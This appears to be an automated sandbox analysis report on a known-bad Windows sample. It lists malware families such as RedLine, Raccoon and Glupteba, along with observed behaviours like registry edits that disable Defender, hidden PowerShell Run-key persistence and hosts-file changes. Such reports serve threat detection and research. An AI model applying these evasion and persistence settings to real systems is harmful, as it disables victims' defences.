Analysis Overview
SHA256
db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716
Threat Level: Known bad
The file db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716 was found to be: Known bad.
Malicious Activity Summary
Detect ZGRat V1
Glupteba payload
Glupteba
RedLine payload
DcRat
RedLine
Raccoon
Suspicious use of NtCreateUserProcessOtherParentProcess
SmokeLoader
ZGRat
Raccoon Stealer payload
Amadey
Modifies Windows Defender Real-time Protection settings
Drops file in Drivers directory
Downloads MZ/PE file
Stops running service(s)
Modifies Windows Firewall
Checks computer location settings
Windows security modification
Executes dropped EXE
Loads dropped DLL
Checks installed software on the system
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in Program Files directory
Launches sc.exe
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Program crash
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Checks SCSI registry key(s)
Modifies data under HKEY_USERS
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Enumerates system info in registry
Uses Task Scheduler COM API
Creates scheduled task(s)
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-10-26 09:01
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-10-26 09:01
Reported
2023-10-26 09:04
Platform
win10v2004-20231023-en
Max time kernel
112s
Max time network
153s
Command Line
Signatures
Amadey
DcRat
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\A298.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\A298.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\A298.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\A298.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\A298.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\A298.exe | N/A |
Raccoon
Raccoon Stealer payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3956 created 3284 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 3956 created 3284 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 3956 created 3284 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 3956 created 3284 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 3956 created 3284 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
ZGRat
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\kos4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\A345.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A4DC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A4DC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2MK152qh.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2MK152qh.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FEE7.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\A298.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\A298.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\C7D7.exe'\"" | C:\Users\Admin\AppData\Local\Temp\C7D7.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\9EEB.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2860 set thread context of 5000 | N/A | C:\Users\Admin\AppData\Local\Temp\db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 1844 set thread context of 4268 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Rs37xE9.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 1360 set thread context of 1912 | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe |
| PID 4784 set thread context of 4908 | N/A | C:\Users\Admin\AppData\Local\Temp\FEE7.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Drive Tools\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Drive Tools\zDriveTools.exe | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-QHIS9.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-92N1I.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-346PL.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-NHV86.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-UDRBQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-35863.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-TJOHU.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-Q39LK.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\Lang\is-3MU64.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-K1T3V.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-KVQLA.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-KNKI9.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-2JNJ9.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-J503B.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-7415O.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-UGRQO.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-9MS75.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-1D08O.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-SNUM9.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-FOIIJ.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-F63PC.tmp | C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune | C:\Users\Admin\AppData\Local\Temp\A4DC.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\A4DC.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\CDE3.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
